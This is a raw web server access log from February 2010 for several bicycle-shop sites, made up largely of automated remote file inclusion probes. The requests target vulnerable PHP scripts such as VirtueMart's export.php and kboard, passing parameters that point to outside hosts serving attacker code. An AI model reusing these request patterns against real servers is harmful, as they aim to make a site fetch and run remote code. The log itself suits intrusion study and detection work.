122.199.140.158 - - [11/Feb/2010:02:52:09 -0800] "GET /ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
122.199.140.158 - - [11/Feb/2010:02:52:09 -0800] "GET /translations/Portuguese_BR.txt//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
122.199.140.158 - - [11/Feb/2010:02:52:10 -0800] "GET /translations//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
200.93.147.154 - - [11/Feb/2010:02:52:13 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:52:13 -0800] "GET /ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
200.93.147.154 - - [11/Feb/2010:02:52:13 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Feb/2010:02:52:13 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:52:14 -0800] "GET /translations/Portuguese_BR.txt//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
122.199.140.158 - - [11/Feb/2010:02:52:14 -0800] "GET /translations//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
200.93.147.154 - - [11/Feb/2010:02:52:28 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Feb/2010:02:52:28 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Feb/2010:02:52:28 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:35 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:35 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:35 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:36 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:36 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:36 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:37 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:37 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:38 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.100.181.217 - - [11/Feb/2010:02:53:38 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:53:42 -0800] "GET /translations//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
122.199.140.158 - - [11/Feb/2010:02:53:42 -0800] "GET /ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
122.199.140.158 - - [11/Feb/2010:02:53:42 -0800] "GET /translations/Welsh.txt//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
122.199.140.158 - - [11/Feb/2010:02:54:52 -0800] "GET /translations/Polish.txt//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:54:52 -0800] "GET /ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:54:52 -0800] "GET /translations/Portuguese.txt//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:54:52 -0800] "GET /translations//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:54:55 -0800] "GET /translations//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:54:55 -0800] "GET /ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:54:56 -0800] "GET /translations/Portuguese.txt//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.199.140.158 - - [11/Feb/2010:02:54:57 -0800] "GET /translations/Polish.txt//ws/get_events.php?includedir=http://www.wellspromotionsltd.com/1/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [11/Feb/2010:02:56:17 -0800] "GET /translations/Danish.txt HTTP/1.1" 200 31970 "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
200.93.147.154 - - [11/Feb/2010:02:56:31 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [11/Feb/2010:02:59:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [11/Feb/2010:02:59:58 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [11/Feb/2010:03:00:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:17:08 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:17:08 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:17:08 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:17:55 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:17:55 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:17:55 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.3.150.104 - - [11/Feb/2010:03:21:07 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.3.150.104 - - [11/Feb/2010:03:21:07 -0800] "GET /delete_comment.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.3.150.104 - - [11/Feb/2010:03:21:07 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.3.150.104 - - [11/Feb/2010:03:21:07 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.3.150.104 - - [11/Feb/2010:03:21:07 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.3.150.104 - - [11/Feb/2010:03:21:07 -0800] "GET /delete_comment.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.59.163.57 - - [11/Feb/2010:03:30:16 -0800] "GET /logs/access.log//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
209.59.163.57 - - [11/Feb/2010:03:30:16 -0800] "GET /errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
209.59.163.57 - - [11/Feb/2010:03:30:16 -0800] "GET /logs//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:30:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:30:51 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:30:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:33:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:33:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:33:12 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [11/Feb/2010:03:34:49 -0800] "GET /bbs//skin/moengallery/ask_password.php?dir=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:35:51 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:35:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:35:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:12 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:12 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:12 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:18 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:18 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:18 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:44 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:44 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [11/Feb/2010:03:41:44 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:03:42:04 -0800] "GET /logs/access.log//public_html/gallery/index.php//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:03:42:04 -0800] "GET /public_html/gallery/index.php//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:03:42:04 -0800] "GET /logs/access.log//public_html/gallery/index.php//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:03:42:04 -0800] "GET /logs//public_html/gallery/index.php//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:03:42:04 -0800] "GET /logs//public_html/gallery/index.php//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [11/Feb/2010:03:42:04 -0800] "GET /public_html/gallery/index.php//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.65.1.208 - - [11/Feb/2010:03:42:33 -0800] "GET /bbs//skin/moengallery/ask_password.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:46:13 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:46:13 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [11/Feb/2010:03:46:13 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.8.75.96 - - [11/Feb/2010:03:46:48 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://svbikes.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "svbikes.com"
194.8.75.96 - - [11/Feb/2010:03:46:48 -0800] "GET / HTTP/1.0" 200 1748 "http://svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "svbikes.com"
194.8.75.96 - - [11/Feb/2010:03:46:49 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "svbikes.com"
67.195.115.111 - - [11/Feb/2010:03:55:13 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
220.73.144.196 - - [11/Feb/2010:03:55:13 -0800] "GET /logs/access.log/?sourcedir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [11/Feb/2010:03:55:13 -0800] "GET /logs/?sourcedir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [11/Feb/2010:03:55:13 -0800] "GET /?sourcedir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
216.65.1.208 - - [11/Feb/2010:03:55:58 -0800] "GET /logs/access.log//bbs//skin/moengallery/ask_password.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
216.65.1.208 - - [11/Feb/2010:03:55:58 -0800] "GET /bbs//skin/moengallery/ask_password.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
216.65.1.208 - - [11/Feb/2010:03:55:58 -0800] "GET /logs//bbs//skin/moengallery/ask_password.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
125.141.91.138 - - [11/Feb/2010:04:00:32 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Feb/2010:04:00:32 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Feb/2010:04:00:32 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Feb/2010:04:01:07 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Feb/2010:04:01:07 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Feb/2010:04:01:07 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:04:45 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:04:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:04:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:05:25 -0800] "GET /translations/English-US.txt%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:05:25 -0800] "GET /translations/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:05:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:05:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:05:52 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.41 - - [11/Feb/2010:04:05:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:06:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:06:23 -0800] "GET /translations/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:06:23 -0800] "GET /translations/English-US.txt%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:07:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:07:41 -0800] "GET /translations/English-US.txt%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:07:41 -0800] "GET /translations/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:08:18 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [11/Feb/2010:04:08:18 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
